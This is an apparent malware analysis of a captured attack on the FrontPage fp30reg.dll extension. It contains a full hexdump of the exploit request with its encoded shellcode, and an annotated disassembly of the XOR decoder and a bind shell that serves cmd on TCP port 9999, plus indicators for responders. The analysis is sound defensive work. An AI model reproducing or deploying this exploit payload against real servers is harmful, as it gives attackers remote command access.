hexdump -C var/hexdumps/1823b5bc18bacfa93a91dbdecad5ad3e.bin 00000000 50 4f 53 54 20 2f 5f 76 74 69 5f 62 69 6e 2f 5f |POST /_vti_bin/_| 00000010 76 74 69 5f 61 75 74 2f 66 70 33 30 72 65 67 2e |vti_aut/fp30reg.| 00000020 64 6c 6c 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f |dll HTTP/1.1..Ho| 00000030 73 74 3a 20 XX XX XX XX XX XX XX XX XX XX XX XX |st: XXXXXXXXXXXX| 00000040 XX 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f |X..Transfer-Enco| 00000050 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 |ding: chunked..C| 00000060 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 |ontent-Length: 1| 00000070 34 39 39 0d 0a 0d 0a 35 64 62 0d 0a 90 90 90 90 |499....5db......| 00000080 90 90 90 90 90 90 90 90 90 90 90 90 ff d0 90 90 |................| 00000090 e0 f3 d4 67 90 90 90 90 90 90 90 90 90 90 90 90 |...g............| 000000a0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................| * 00000180 eb 10 90 90 e4 f3 d4 67 90 90 90 90 90 90 90 90 |.......g........| 00000190 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................| * 000001b0 90 90 90 90 90 90 90 90 90 90 90 90 eb 03 5d eb |..............].| 000001c0 05 e8 f8 ff ff ff 8b c5 83 c0 11 33 c9 66 b9 c9 |...........3.f..| 000001d0 01 80 30 88 40 e2 fa dd 03 64 03 7c 09 64 08 88 |..0.@....d.|.d..| 000001e0 88 88 60 c4 89 88 88 01 ce 74 77 fe 74 e0 06 c6 |..`......tw.t...| 000001f0 86 64 60 d9 89 88 88 01 ce 4e e0 bb ba 88 88 e0 |.d`......N......| 00000200 ff fb ba d7 dc 77 de 4e 01 ce 70 77 fe 74 e0 25 |.....w.N..pw.t.%| 00000210 51 8d 46 60 b8 89 88 88 01 ce 5a 77 fe 74 e0 fa |Q.F`......Zw.t..| 00000220 76 3b 9e 60 a8 89 88 88 01 ce 46 77 fe 74 e0 67 |v;.`......Fw.t.g| 00000230 46 68 e8 60 98 89 88 88 01 ce 42 77 fe 70 e0 43 |Fh.`......Bw.p.C| 00000240 65 74 b3 60 88 89 88 88 01 ce 7c 77 fe 70 e0 51 |et.`......|w.p.Q| 00000250 81 7d 25 60 78 88 88 88 01 ce 78 77 fe 70 e0 2c |.}%`x.....xw.p.,| 00000260 92 f8 4f 60 68 88 88 88 01 ce 64 77 fe 70 e0 2c |..O`h.....dw.p.,| 00000270 25 a6 61 60 58 88 88 88 
01 ce 60 77 fe 70 e0 6d |%.a`X.....`w.p.m| 00000280 c1 0e c1 60 48 88 88 88 01 ce 6a 77 fe 70 e0 6f |...`H.....jw.p.o| 00000290 f1 4e f1 60 38 88 88 88 01 ce 5e bb 77 09 64 7c |.N.`8.....^.w.d|| 000002a0 89 88 88 dc e0 89 89 88 88 77 de 7c d8 d8 d8 d8 |.........w.|....| 000002b0 c8 d8 c8 d8 77 de 78 03 50 df df e0 8a 88 af 87 |....w.x.P.......| 000002c0 03 44 e2 9e d9 db 77 de 64 df db 77 de 60 bb 77 |.D....w.d..w.`.w| 000002d0 df d9 db 77 de 6a 03 58 01 ce 36 e0 eb e5 ec 88 |...w.j.X..6.....| 000002e0 01 ee 4a 0b 4c 24 05 b4 ac bb 48 bb 41 08 49 9d |..J.L$....H.A.I.| 000002f0 23 6a 75 4e cc ac 98 cc 76 cc ac b5 01 dc ac c0 |#juN....v.......| 00000300 01 dc ac c4 01 dc ac d8 05 cc ac 98 dc d8 d9 d9 |................| 00000310 d9 c9 d9 c1 d9 d9 77 fe 4a d9 77 de 46 03 44 e2 |......w.J.w.F.D.| 00000320 77 77 b9 77 de 5a 03 40 77 fe 36 77 de 5e 63 16 |ww.w.Z.@w.6w.^c.| 00000330 77 de 9c de ec 29 b8 88 88 88 03 c8 84 03 f8 94 |w....)..........| 00000340 25 03 c8 80 d6 4a 8c 88 db dd de df 03 e4 ac 90 |%....J..........| 00000350 03 cd b4 03 dc 8d f0 8b 5d 03 c2 90 03 d2 a8 8b |........].......| 00000360 55 6b ba c1 03 bc 03 8b 7d bb 77 74 bb 48 24 b2 |Uk......}.wt.H$.| 00000370 4c fc 8f 49 47 85 8b 70 63 7a b3 f4 ac 9c fd 69 |L..IG..pcz.....i| 00000380 03 d2 ac 8b 55 ee 03 84 c3 03 d2 94 8b 55 03 8c |....U........U..| 00000390 03 8b 4d 63 8a bb 48 03 5d d7 d6 d5 d3 4a 8c 88 |..Mc..H.]....J..| 000003a0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................| * 00000650 90 90 90 90 90 90 90 0d 0a 30 0d 0a 0d 0a |.........0....| 0000065e
; Decoder stub of the captured payload, as shown by the debugger
; (columns: address, opcode bytes, 32-bit x86 instruction in Intel operand order).
; Purpose: find its own address at run time, then XOR-decode the 0x1C9 bytes
; that follow it in place with the single-byte key 0x88.
; Analyst note: key and length are fixed constants, so the encoded body in a
; capture can be decoded statically without running the sample.
00424A3D  EB 03          JMP SHORT 722b3019.00424A42       ; hop forward to the CALL below
00424A3F  5D             POP EBP                           ; EBP = return address pushed by the CALL = 00424A47
00424A40  EB 05          JMP SHORT 722b3019.00424A47       ; skip over the CALL now that EBP is set
00424A42  E8 F8FFFFFF    CALL 722b3019.00424A3F            ; backward CALL: pushes 00424A47, lands on POP EBP
00424A47  8BC5           MOV EAX,EBP                       ; EAX = 00424A47
00424A49  83C0 11        ADD EAX,11                        ; EAX = 00424A58, the first byte after the LOOPD below
00424A4C  33C9           XOR ECX,ECX                       ; clear ECX before the 16-bit load
00424A4E  66:B9 C901     MOV CX,1C9                        ; xor size: 0x1C9 (457) bytes to decode
00424A52  8030 88        XOR BYTE PTR DS:[EAX],88          ; xor key 88, applied to one byte per pass
00424A55  40             INC EAX                           ; next encoded byte
00424A56 ^E2 FA          LOOPD SHORT 722b3019.00424A52     ; repeat until ECX reaches 0, then fall through at 00424A58
; Full listing of the payload after decoding, as shown by the debugger
; (columns: address, opcode bytes, 32-bit x86 instruction in Intel operand order).
; What the visible code does, in order:
;   1. XOR-decodes 0x1C9 bytes of itself with key 0x88 (00424A3D-00424A56).
;   2. Resolves API addresses through two helpers (00424BB4, 00424BC9) that are
;      NOT part of this listing, and stores them at negative offsets from ESI.
;   3. Creates a TCP socket, binds it to port 9999 and listens.
;   4. For each accepted connection, starts "cmd" with the accepted socket as its
;      stdin/stdout/stderr, waits for it to exit, closes the socket, and loops.
; Indicators for responders, all taken from the code below: a listener on
; TCP 9999 in the exploited process, and a cmd child process created with
; inherited handles whose standard handles are a socket.
; The API names in the comments are the labels given in the original listing.
;
; ESI-relative slots written below:
;   [ESI-4]  module handle from 00424BB4      [ESI-8]  ws2_32 module handle
;   [ESI-C]  WSAStartup     [ESI-10] WSASocketA    [ESI-14] bind
;   [ESI-18] listen         [ESI-1E] accept        [ESI-2A] closesocket
;   [ESI-2E] WaitForSingleObject   [ESI-32] CreateProcessA
;   [ESI-36] ExitThread     [ESI-3A] LoadLibraryA
;   [ESI-3E] pointer to the "cmd" string      [ESI-42] accepted socket

; --- tail of the NOP padding that precedes the decoder ---
00424A35  90             NOP
00424A36  90             NOP
00424A37  90             NOP
00424A38  90             NOP
00424A39  90             NOP
00424A3A  90             NOP
00424A3B  90             NOP
00424A3C  90             NOP

; --- decoder stub: locate self, XOR-decode the body in place ---
00424A3D  EB 03          JMP SHORT 722b3019.00424A42       ; hop forward to the CALL below
00424A3F  5D             POP EBP                           ; EBP = return address pushed by the CALL = 00424A47
00424A40  EB 05          JMP SHORT 722b3019.00424A47       ; skip over the CALL now that EBP is set
00424A42  E8 F8FFFFFF    CALL 722b3019.00424A3F            ; backward CALL: pushes 00424A47, lands on POP EBP
00424A47  8BC5           MOV EAX,EBP                       ; EAX = 00424A47
00424A49  83C0 11        ADD EAX,11                        ; EAX = 00424A58, first byte of the encoded body
00424A4C  33C9           XOR ECX,ECX                       ; clear ECX before the 16-bit load
00424A4E  66:B9 C901     MOV CX,1C9                        ; xor size: 0x1C9 (457) bytes to decode
00424A52  8030 88        XOR BYTE PTR DS:[EAX],88          ; xor key 88, applied to one byte per pass
00424A55  40             INC EAX                           ; next encoded byte
00424A56 ^E2 FA          LOOPD SHORT 722b3019.00424A52     ; repeat until ECX reaches 0

; --- decoded body: frame setup ---
00424A58  55             PUSH EBP
00424A59  8BEC           MOV EBP,ESP
00424A5B  8BF4           MOV ESI,ESP                       ; ESI = base for every saved pointer below
00424A5D  81EC 80000000  SUB ESP,80                        ; reserve 0x80 bytes so the ESI-relative slots are below ESP's pushes

; --- API resolution ---
; 00424BB4 and 00424BC9 lie outside this listing. 00424BB4's result is used as the
; module from which LoadLibraryA etc. are resolved (presumably the kernel32 base;
; confirm against the helper). 00424BC9 takes (module, 32-bit constant) and its
; result is stored as a function pointer; the constant is presumably a hash of
; the export name, but the mapping is not visible here.
00424A63  E8 4C010000    CALL 722b3019.00424BB4
00424A68  8946 FC        MOV DWORD PTR DS:[ESI-4],EAX      ; save module handle returned by 00424BB4
00424A6B  FF76 FC        PUSH DWORD PTR DS:[ESI-4]         ; arg: module
00424A6E  68 8E4E0EEC    PUSH EC0E4E8E                     ; arg: selector constant for the wanted export
00424A73  E8 51010000    CALL 722b3019.00424BC9
00424A78  8946 C6        MOV DWORD PTR DS:[ESI-3A],EAX     ; LoadLibraryA
00424A7B  68 33320000    PUSH 3233                         ; bytes 33 32 00 00 = "32" + terminator
00424A80  68 7773325F    PUSH 5F327377                     ; bytes 77 73 32 5F = "ws2_"; stack now holds "ws2_32"
00424A85  54             PUSH ESP                          ; arg: pointer to the "ws2_32" string
00424A86  FF56 C6        CALL DWORD PTR DS:[ESI-3A]        ; call LoadLibraryA
00424A89  8946 F8        MOV DWORD PTR DS:[ESI-8],EAX      ; ws2_32 module handle (debugger label: WS2_32.#390)
00424A8C  FF76 FC        PUSH DWORD PTR DS:[ESI-4]
00424A8F  68 ADD905CE    PUSH CE05D9AD
00424A94  E8 30010000    CALL 722b3019.00424BC9
00424A99  8946 D2        MOV DWORD PTR DS:[ESI-2E],EAX     ; WaitForSingleObject
00424A9C  FF76 FC        PUSH DWORD PTR DS:[ESI-4]
00424A9F  68 72FEB316    PUSH 16B3FE72
00424AA4  E8 20010000    CALL 722b3019.00424BC9
00424AA9  8946 CE        MOV DWORD PTR DS:[ESI-32],EAX     ; CreateProcessA
00424AAC  FF76 FC        PUSH DWORD PTR DS:[ESI-4]
00424AAF  68 EFCEE060    PUSH 60E0CEEF
00424AB4  E8 10010000    CALL 722b3019.00424BC9
00424AB9  8946 CA        MOV DWORD PTR DS:[ESI-36],EAX     ; ExitThread (stored; no call through this slot appears in the listing)
00424ABC  FF76 F8        PUSH DWORD PTR DS:[ESI-8]         ; from here on the module argument is the ws2_32 handle
00424ABF  68 CBEDFC3B    PUSH 3BFCEDCB
00424AC4  E8 00010000    CALL 722b3019.00424BC9
00424AC9  8946 F4        MOV DWORD PTR DS:[ESI-C],EAX      ; WSAStartup
00424ACC  FF76 F8        PUSH DWORD PTR DS:[ESI-8]
00424ACF  68 D909F5AD    PUSH ADF509D9
00424AD4  E8 F0000000    CALL 722b3019.00424BC9
00424AD9  8946 F0        MOV DWORD PTR DS:[ESI-10],EAX     ; WSASocketA
00424ADC  FF76 F8        PUSH DWORD PTR DS:[ESI-8]
00424ADF  68 A41A70C7    PUSH C7701AA4
00424AE4  E8 E0000000    CALL 722b3019.00424BC9
00424AE9  8946 EC        MOV DWORD PTR DS:[ESI-14],EAX     ; bind
00424AEC  FF76 F8        PUSH DWORD PTR DS:[ESI-8]
00424AEF  68 A4AD2EE9    PUSH E92EADA4
00424AF4  E8 D0000000    CALL 722b3019.00424BC9
00424AF9  8946 E8        MOV DWORD PTR DS:[ESI-18],EAX     ; listen
00424AFC  FF76 F8        PUSH DWORD PTR DS:[ESI-8]
00424AFF  68 E5498649    PUSH 498649E5
00424B04  E8 C0000000    CALL 722b3019.00424BC9
00424B09  8946 E2        MOV DWORD PTR DS:[ESI-1E],EAX     ; accept
00424B0C  FF76 F8        PUSH DWORD PTR DS:[ESI-8]
00424B0F  68 E779C679    PUSH 79C679E7
00424B14  E8 B0000000    CALL 722b3019.00424BC9
00424B19  8946 D6        MOV DWORD PTR DS:[ESI-2A],EAX     ; closesocket

; --- socket setup: WSAStartup, WSASocketA, bind, listen ---
00424B1C  33FF           XOR EDI,EDI                       ; EDI = 0, reused below as a zero argument
00424B1E  81EC F4010000  SUB ESP,1F4                       ; reserve 0x1F4 bytes; their address is passed as the WSAStartup output buffer
00424B24  54             PUSH ESP                          ; arg 2: pointer to that buffer
00424B25  68 01010000    PUSH 101                          ; arg 1: requested Winsock version 1.1
00424B2A  FF56 F4        CALL DWORD PTR DS:[ESI-C]         ; call WSAStartup
00424B2D  50             PUSH EAX                          ; the next six pushes reuse EAX and so rely on
00424B2E  50             PUSH EAX                          ;   WSAStartup having returned 0 (success):
00424B2F  50             PUSH EAX                          ;   four zero arguments,
00424B30  50             PUSH EAX
00424B31  40             INC EAX
00424B32  50             PUSH EAX                          ;   then 1 (type = SOCK_STREAM),
00424B33  40             INC EAX
00424B34  50             PUSH EAX                          ;   then 2 (af = AF_INET)
00424B35  FF56 F0        CALL DWORD PTR DS:[ESI-10]        ; call WSASocketA
00424B38  8BD8           MOV EBX,EAX                       ; EBX = listening socket
00424B3A  57             PUSH EDI                          ; zero dword (trailing part of the address structure)
00424B3B  57             PUSH EDI                          ; zero dword: address 0.0.0.0, i.e. all interfaces
00424B3C  68 0200270F    PUSH 0F270002                     ; bytes 02 00 27 0F: family 2, port 270f ( 9999 ) in network order
00424B41  8BCC           MOV ECX,ESP                       ; ECX = pointer to the address structure just built
00424B43  6A 16          PUSH 16                           ; arg 3: length 0x16 (22), larger than the 12 bytes built above
00424B45  51             PUSH ECX                          ; arg 2: address structure
00424B46  53             PUSH EBX                          ; arg 1: socket
00424B47  FF56 EC        CALL DWORD PTR DS:[ESI-14]        ; call bind
00424B4A  57             PUSH EDI                          ; arg 2: backlog 0
00424B4B  53             PUSH EBX                          ; arg 1: socket
00424B4C  FF56 E8        CALL DWORD PTR DS:[ESI-18]        ; call listen

; --- accept loop (target of the JMP at 00424BAF) ---
; ESP is never raised again inside the loop, so every pass consumes another
; 0x58 bytes of stack (4 for "cmd" plus the 0x54-byte block).
00424B4F  33FF           XOR EDI,EDI
00424B51  57             PUSH EDI                          ; arg 3: 0
00424B52  51             PUSH ECX                          ; arg 2: ECX is not reloaded after the preceding API call
                                                           ;   NOTE(review): its value here is whatever that call left; confirm in a trace
00424B53  53             PUSH EBX                          ; arg 1: listening socket
00424B54  FF56 E2        CALL DWORD PTR DS:[ESI-1E]        ; call accept
00424B57  8BD0           MOV EDX,EAX                       ; EDX = accepted socket, used for the three handle fields below
00424B59  8946 BE        MOV DWORD PTR DS:[ESI-42],EAX     ; keep the accepted socket for closesocket
00424B5C  68 636D6400    PUSH 646D63                       ; bytes 63 6D 64 00 = "cmd" + terminator
00424B61  8966 C2        MOV DWORD PTR DS:[ESI-3E],ESP     ; save pointer to the "cmd" string
00424B64  83C4 AC        ADD ESP,-54                       ; reserve 0x54 bytes for the two structures passed to CreateProcessA
00424B67  8D3C24         LEA EDI,DWORD PTR SS:[ESP]        ; EDI = start of that block
00424B6A  33C0           XOR EAX,EAX                       ; fill value 0
00424B6C  33C9           XOR ECX,ECX
00424B6E  80C1 15        ADD CL,15                         ; 0x15 dwords = 0x54 bytes
00424B71  AB             STOS DWORD PTR ES:[EDI]           ; zero the block one dword at a time
00424B72 ^E2 FD          LOOPD SHORT 722b3019.00424B71     ; leaves ECX = 0, reused as the zero argument below
; The block at ESP+10 is passed as lpStartupInfo and the block at ESP as the
; output structure. Field names follow the STARTUPINFOA layout.
00424B74  C64424 10 44   MOV BYTE PTR SS:[ESP+10],44       ; +0x00: cb = 0x44
00424B79  FE4424 3D      INC BYTE PTR SS:[ESP+3D]          ; +0x2D: second byte of dwFlags -> 0x100 (use the std handle fields)
00424B7D  895424 48      MOV DWORD PTR SS:[ESP+48],EDX     ; +0x38: hStdInput  = accepted socket
00424B81  895424 4C      MOV DWORD PTR SS:[ESP+4C],EDX     ; +0x3C: hStdOutput = accepted socket
00424B85  895424 50      MOV DWORD PTR SS:[ESP+50],EDX     ; +0x40: hStdError  = accepted socket
00424B89  8D4424 10      LEA EAX,DWORD PTR SS:[ESP+10]     ; EAX = pointer to the startup structure
; CreateProcessA arguments, pushed last-to-first
00424B8D  54             PUSH ESP                          ; arg 10: output structure (process information) at ESP
00424B8E  50             PUSH EAX                          ; arg 9: startup structure
00424B8F  51             PUSH ECX                          ; arg 8: 0
00424B90  51             PUSH ECX                          ; arg 7: 0
00424B91  51             PUSH ECX                          ; arg 6: creation flags 0
00424B92  41             INC ECX
00424B93  51             PUSH ECX                          ; arg 5: 1 = inherit handles, so the child receives the socket
00424B94  49             DEC ECX
00424B95  51             PUSH ECX                          ; arg 4: 0
00424B96  51             PUSH ECX                          ; arg 3: 0
00424B97  FF76 C2        PUSH DWORD PTR DS:[ESI-3E]        ; arg 2: command line "cmd"
00424B9A  51             PUSH ECX                          ; arg 1: application name 0
00424B9B  FF56 CE        CALL DWORD PTR DS:[ESI-32]        ; call CreateProcessA
00424B9E  8BCC           MOV ECX,ESP                       ; ECX = output structure; its first dword is the process handle
00424BA0  6A FF          PUSH -1                           ; arg 2: no timeout (wait indefinitely)
00424BA2  FF31           PUSH DWORD PTR DS:[ECX]           ; arg 1: process handle
00424BA4  FF56 D2        CALL DWORD PTR DS:[ESI-2E]        ; call WaitForSingleObject
00424BA7  8BC8           MOV ECX,EAX                       ; wait result copied to ECX; not tested anywhere in the listing
00424BA9  FF76 BE        PUSH DWORD PTR DS:[ESI-42]        ; arg 1: accepted socket
00424BAC  FF56 D6        CALL DWORD PTR DS:[ESI-2A]        ; call closesocket
00424BAF ^EB 9E          JMP SHORT 722b3019.00424B4F       ; back to accept: the listener stays up for the next connection
; Not reachable by fall-through (follows an unconditional JMP), and no visible
; instruction writes [ESI+14]; the listing ends here, before helper 00424BB4.
00424BB1  FF56 14        CALL DWORD PTR DS:[ESI+14]